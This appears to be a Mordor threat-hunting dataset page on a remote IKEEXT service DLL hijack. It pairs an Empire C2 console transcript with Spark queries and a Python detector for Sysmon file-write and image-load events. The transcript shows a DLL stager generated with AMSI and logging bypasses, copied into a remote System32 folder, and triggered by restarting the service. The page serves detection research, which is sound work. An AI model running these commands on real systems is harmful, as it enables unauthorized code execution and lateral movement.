IKEEXT Remote Service DLL Hijack

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/04/03

Modification Date

2020/09/20

Tactics

['TA0003', 'TA0004', 'TA0005']

Techniques

['T1574.001']

Tags

['Remote Service DLL Hijacking', 'RPC over SMB Svcctl']

Dataset Description

This dataset represents adversaries copying a file remotely to replace a file that is executed by a service vulnerable to DLL hijacking. This dataset includes

Notebooks

Notebooks created by the community leveraging the mordor datasets

  Author           Name             Link
  ------           ----             ----

Simulation Plan

  Environment      Tool Type        Module
  -----------      ---------        ------
  Mordor shire     C2               manual

Adversary View

(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to use.
  Language         True        powershell        Language of the stager to generate.
  Arch             True        x64               Architecture of the .dll to generate
                                                (x64 or x86).
  StagerRetries    False       0                 Times for the stager to retry
                                                connecting.
  UserAgent        False       default           User-agent string to use for the staging
                                                request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                or other).
  ProxyCreds       False       default           Proxy credentials
                                                ([domain\]username:password) to use for
                                                request (default, none, or other).
  OutFile          True        /tmp/wlbsctrl.dll File to output dll to.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                powershell code, uses the
                                                ObfuscateCommand for obfuscation types.
                                                For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                Only used if Obfuscate switch is True.
                                                For powershell only.
  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in
                                                the stager code.
  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in
                                                the stager code.
  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass
                                                in the stager code.
  ETWBypass        False       False             Include tandasat's ETW bypass in the
                                                stager code.

(Empire: stager/windows/dll) > back
(Empire: agents) > agents

[*] Active agents:

  Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
  ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
  GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         1112   5/0.0    2020-09-22 03:51:02  http            

(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) > 
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x1388

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED 
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6172
        FLAGS              : 

..Command execution completed.

(Empire: GCSKD17Z) >

Explore Mordor Dataset

Initialize Analytics Engine

# Load the mordor helper functions and start a local Spark session
from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

# Download the dataset archive and expose it as a temporary SparkSQL view named mordorTable
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Count events per host, channel and event ID to see which log sources carry the most records
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local    |Security                                |4658   |768  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |508  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |466  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |409  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |386  |
|MORDORDC.theshire.local    |Security                                |4656   |384  |
|MORDORDC.theshire.local    |Security                                |4690   |384  |
|MORDORDC.theshire.local    |Security                                |4663   |367  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |328  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |286  |
|MORDORDC.theshire.local    |Security                                |5447   |192  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |176  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |169  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |158  |
|MORDORDC.theshire.local    |Security                                |5156   |123  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |92   |
|MORDORDC.theshire.local    |Security                                |5158   |89   |
|WORKSTATION5.theshire.local|security                                |5158   |76   |
|MORDORDC.theshire.local    |Security                                |4703   |72   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
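The adversary view above leaves two host-side traces on WORKSTATION6: wlbsctrl.dll written into System32 over the C$ share, and svchost.exe (hosting IKEEXT) loading that DLL once the service is restarted. The following is an added example, not code from the Mordor project, that correlates those two Sysmon signals (Event ID 11 FileCreate, then Event ID 7 ImageLoad) over constructed sample events; the field names (Hostname, Channel, EventID, Image, TargetFilename, ImageLoaded, @timestamp) are assumed Sysmon-style names and may differ from the dataset's columns.

```python
# Added example: correlate a remote write of wlbsctrl.dll into System32 with a
# later load of that DLL by svchost.exe on the same host. Field names are
# assumed Sysmon-style column names, not verified against the dataset schema.
import ntpath

HIJACK_DLL = "wlbsctrl.dll"     # DLL IKEEXT looks for that Windows does not ship
SERVICE_HOST = "svchost.exe"    # IKEEXT runs inside an svchost.exe process
SYSMON = "Microsoft-Windows-Sysmon/Operational"

# Constructed sample events (not taken from the dataset). A file written over
# SMB is attributed by Sysmon to the kernel, hence Image "System" on the write.
EVENTS = [
    {"@timestamp": "2020-09-22T03:52:10", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": SYSMON, "EventID": 11, "Image": "System",
     "TargetFilename": r"C:\Windows\System32\wlbsctrl.dll"},
    {"@timestamp": "2020-09-22T03:53:05", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": SYSMON, "EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\wlbsctrl.dll"},
    {"@timestamp": "2020-09-22T03:53:06", "Hostname": "WORKSTATION5.theshire.local",
     "Channel": SYSMON, "EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]


def is_system32_path(path):
    """True when the path lives directly under C:\\Windows\\System32 (case-insensitive)."""
    return path.lower().replace("/", "\\").startswith("c:\\windows\\system32\\")


def find_hijack_candidates(events):
    """Return hosts where wlbsctrl.dll landed in System32 and svchost.exe loaded it afterwards."""
    first_write = {}   # host -> earliest Sysmon 11 timestamp for the hijack DLL
    loads = []         # (host, timestamp) for Sysmon 7 loads of the DLL by svchost.exe
    for ev in events:
        if ev.get("Channel") != SYSMON:
            continue
        host, ts = ev["Hostname"], ev["@timestamp"]
        if ev["EventID"] == 11:
            path = ev.get("TargetFilename", "")
            if ntpath.basename(path).lower() == HIJACK_DLL and is_system32_path(path):
                first_write[host] = min(ts, first_write.get(host, ts))
        elif ev["EventID"] == 7:
            dll = ntpath.basename(ev.get("ImageLoaded", "")).lower()
            proc = ntpath.basename(ev.get("Image", "")).lower()
            if dll == HIJACK_DLL and proc == SERVICE_HOST:
                loads.append((host, ts))
    # Only flag a host when the load follows the write (ISO timestamps sort lexically).
    return sorted({h for h, ts in loads if h in first_write and ts >= first_write[h]})
```

Running `find_hijack_candidates(EVENTS)` on the constructed events flags only WORKSTATION6; in the real dataset the same logic applies to a DataFrame collected from mordorTable after filtering to Sysmon events 7 and 11.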